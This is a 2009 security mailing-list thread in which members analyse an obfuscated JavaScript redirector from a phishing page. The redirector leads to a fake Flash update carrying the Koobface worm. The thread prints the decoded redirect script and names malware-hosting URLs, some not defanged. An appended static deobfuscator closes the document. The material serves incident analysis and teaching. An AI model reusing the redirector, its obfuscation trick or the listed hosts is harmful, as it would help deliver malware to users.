The URL is encoded in this line:

n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,"");

The replace command as used here is basically replacing the specified characters with 'nothing'... so once you've stripped out all the fdkjg characters, this is what's left:

n516dc="http://www.businessinabox.com.au/357/";

For anybody who's interested, the full decoded (and somewhat simplified and commented) script is as follows:

oa8ea5=eval("document.referrer").indexOf("msplinks.com");
pab=eval("document.referrer").indexOf("myspace.com");
qa53a=eval("document.referrer").indexOf("lnk.ms");
//If the referrer contains any of the above strings, then append '&ms' to the query
bf2ebbb9='';
if(oa8ea5+pab+qa53a!=-3)bf2ebbb9='&ms';
location="http://www.businessinabox.com.au/357/?go"+bf2ebbb9;

The script at the specified location is what actually redirects to the attack sites...

-Dave

From: [email protected] [mailto:[email protected]] On Behalf Of Chris Blazek
Sent: Wednesday, December 02, 2009 2:28 PM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] phishing question

That section you unwrapped looks like it sets a location variable that is then used in the google friend connect stuff. I went looking through the script blocks and I'm not finding any reference to the businessinabox site. How did you get to that point? Just curious, trying to learn.

Chris

On Wed, Dec 2, 2009 at 1:01 PM, Chris Blazek <[email protected]> wrote:

Thanks! The user sent me a snapshot of symantec finding the koobface infection. I found a mcafee article that mentions the worm on what David found: http://vil.nai.com/vil/content/v_148955.htm

I was trying to use malzilla to decode that script block but really didn't have much luck because of my experience with the app.

Thanks for the help, great community!

Chris

On Wed, Dec 2, 2009 at 12:03 PM, David Auclair <[email protected]> wrote:

The obfuscation wasn't too bad in this case... Just a couple tricks repeated over and over. I manually 'unwrapped' the layers of obfuscation, and ended up with some pretty simple code. For example:

c4239='do';
db749="coaujoimrggh".replace(/[oajirgh]+/g,"");
eaf76='ent.r';
f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,"");
gda746b57='rer';
a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57);

This is basically a set of strings containing extra characters that are stripped out by the replace commands, then merged. This can be simplified to:

c4239='do';
db749="cum";
eaf76='ent.r';
f638e36f4="efer";
gda746b57='rer';
a206c=eval("document.referrer");

-Dave

> -----Original Message-----
> From: [email protected] [mailto:[email protected]] On Behalf Of David Shpritz
> Sent: Wednesday, December 02, 2009 12:44 PM
> To: PaulDotCom Security Weekly Mailing List
> Subject: Re: [Pauldotcom] phishing question
>
> Hey David,
> Would you mind telling us what method you used to deobfuscate the scripts? Usually I have done these by hand or used Malzilla, but I'm always looking for new methods. Thanks!
>
> David Shpritz
>
> -----Original Message-----
> From: [email protected] [mailto:[email protected]] On Behalf Of David Auclair
> Sent: Wednesday, December 02, 2009 9:45 AM
> To: PaulDotCom Security Weekly Mailing List
> Subject: Re: [Pauldotcom] phishing question
>
> It looks like the javascript on the page you mentioned leads to this page:
> hxxp://www . businessinabox . com . au/357/?go
>
> Which is full of more obfuscated javascript, which leads to sites such as:
> hxxp:// 62.204.113.141 /d=www.facebook.com/0x3E8/f=fb2/view/console=yes/
>
> Which seems to have a 'you need to update your flash player' image, linking to setup.exe
>
> According to virustotal, the setup.exe contains koobface:
> http://www.virustotal.com/analisis/5e9ce9c41a8f46d5dfc4ce366f6f47cb347bcbaa93cd1fcb132a72f61bab14e1-1259705119
>
> -Dave
>
> > -----Original Message-----
> > From: [email protected] [mailto:[email protected]] On Behalf Of Chris Blazek
> > Sent: Wednesday, December 02, 2009 12:04 AM
> > To: PaulDotCom Security Weekly Mailing List
> > Subject: Re: [Pauldotcom] phishing question
> >
> > PJ,
> > Yeah, I had the user change all passwords from the email account to fb. I had tried googling for that 1st part of the address, hoping someone had posted something about it. That came up empty.
> > I tried to get malzilla to decode it, but I really have little experience decoding JavaScript like that.
> > I'll try looking for deobfuscators to see if something else can decode it.
> > Sorry for the typos in the original email. :)
> >
> > Thanks for the help!
> >
> > Chris
> >
> > On Dec 1, 2009, at 8:47 PM, PJ McGarvey <[email protected]> wrote:
> >
> > > Well, if you mean what does the obfuscated code do, there are a few sites I've used that can "de-obfuscate" code however sometimes all that can tell you is that "yeah, it's probably malicious". I would google for "javascript deobfuscate".
> > >
> > > You could submit the blogspot site to an online sandbox for analysis, like I just did:
> > >
> > > http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html
> > >
> > > and possibly find other URLs found in the de-obfuscated code to see what they do.... like this one
> > > http://1nonsensical.cn/?pid=312s02&sid=4db12f
> > >
> > > ... I've yet to find a .cn domain name I could trust. LOL.
> > >
> > > Follow down the rabbit hole...
> > >
> > > That way you can find out if the PC was infected, and how to clean it up.
> > >
> > > Otherwise it would seem like some sort of facebook worm that spreads using the FB address book. Was the user logged into Facebook at the time? Might be a good idea to change their password, sounds like it either used the active facebook session to send itself out, or maybe a cookie with the user's saved credentials.
> > >
> > > PJ
> > >
> > > From: [email protected]
> > > Date: Tue, 1 Dec 2009 14:54:36 -0600
> > > To: [email protected]
> > > Subject: [Pauldotcom] phishing question
> > >
> > > A coworker clicked on a link in an email and was directed to facebook then redirected to the following site:
> > > despatiesmercemerce . blogspot . com
> > > All of their fb contacts then received the same email. I pulled up the site in malzilla and noticed a script block in the header that looks like it's obfuscated.
> > >
> > > I was wondering if someone in the group could figure out what the site was trying to do.
> > >
> > > Thanks,
> > > Chris
> > >
> > > _______________________________________________
> > > Pauldotcom mailing list
> > > [email protected]
> > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > > Main Web Site: http://pauldotcom.com

--
http://www.kingbin.net/
Sent from Lubbock, TX, United States
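The two tricks Dave unwrapped by hand (a junk-padded string cleaned by `.replace(/[chars]+/g,"")`, then pieces glued together and fed to `eval`) can be resolved statically, which is how an analyst avoids ever executing the sample. The following is an added example written for this page; it is not code from the thread or from any of its participants. It assumes only those two patterns, never calls `eval()`, and the sample input is a constructed join of the fragments quoted above. Resolved URLs are reported defanged, in the same spirit as the hxxp:// notation used in the thread.

```javascript
// Added example (not from the thread): static resolver for the
// replace()-stripping obfuscation seen in the Koobface redirector.
// Handles exactly two patterns, both quoted in the thread:
//   "junk".replace(/[chars]+/g,"")      -> literal with chars removed
//   eval(a+b+"lit"+c) over known literals -> the expression text itself
// Limitation: a '+' inside a string literal is not handled (not needed here).

// "body".replace(/[chars]+/g,"")  ->  "body with chars removed"
const STRIP_RE = /(["'])([^"'\\]*)\1\.replace\(\/\[([^\]]+)\]\+\/g\s*,\s*(["'])\4\)/g;

function stripCharClass(body, cls) {
  const drop = new Set(cls);          // every character inside [...]
  let out = "";
  for (const ch of body) if (!drop.has(ch)) out += ch;
  return out;
}

function resolveStrips(src) {
  return src.replace(STRIP_RE, (_m, q, body, cls) => q + stripCharClass(body, cls) + q);
}

// name='literal'; or name="literal";  ->  map of known string variables
const ASSIGN_RE = /\b([A-Za-z_$][\w$]*)\s*=\s*(["'])([^"'\\]*)\2\s*;/g;

function collectLiterals(src) {
  const vars = new Map();
  for (const m of src.matchAll(ASSIGN_RE)) vars.set(m[1], m[3]);
  return vars;
}

// Resolve a '+' chain of names and string literals; null if any part is unknown.
function resolveConcat(expr, vars) {
  let out = "";
  for (const part of expr.split("+").map(s => s.trim())) {
    const lit = part.match(/^(["'])([^"'\\]*)\1$/);
    if (lit) out += lit[2];
    else if (vars.has(part)) out += vars.get(part);
    else return null;
  }
  return out;
}

// eval(<resolvable chain>) -> the resolved text, since eval of a string
// that is just an expression yields that expression (e.g. document.referrer).
const EVAL_RE = /\beval\(([^()]*)\)/g;

function resolveEvals(src, vars) {
  return src.replace(EVAL_RE, (m, expr) => {
    const s = resolveConcat(expr, vars);
    return s === null ? m : s;       // leave unresolvable evals untouched
  });
}

// Report URLs in a form that cannot be clicked by accident.
function defang(url) {
  return url.replace(/^http/, "hxxp").replace(/\./g, "[.]");
}

function deobfuscate(src) {
  const stripped = resolveStrips(src);
  const vars = collectLiterals(stripped);
  const cleaned = resolveEvals(stripped, vars);
  const urls = [...cleaned.matchAll(/https?:\/\/[^\s"'<>]+/g)].map(m => m[0]);
  return { cleaned, vars, indicators: urls.map(defang) };
}

// Constructed sample: the fragments quoted in the thread, joined into one script.
const SAMPLE = [
  `c4239='do';`,
  `db749="coaujoimrggh".replace(/[oajirgh]+/g,"");`,
  `eaf76='ent.r';`,
  `f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,"");`,
  `gda746b57='rer';`,
  `a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57);`,
  `n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,"");`,
].join("\n");

const result = deobfuscate(SAMPLE);
console.log(result.cleaned);      // readable script: a206c=document.referrer; ...
console.log(result.indicators);   // defanged URLs for the incident record
```

The resolver deliberately stops at text rewriting: the output is a readable script plus a list of indicators, and nothing from the sample is ever executed. Real droppers usually stack more layers than these two (Dave mentions "a couple tricks repeated over and over"), so in practice the pass is run repeatedly until the text stops changing, and anything still wrapped in an unresolved `eval` is a cue to switch to a sandbox rather than to a real browser.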
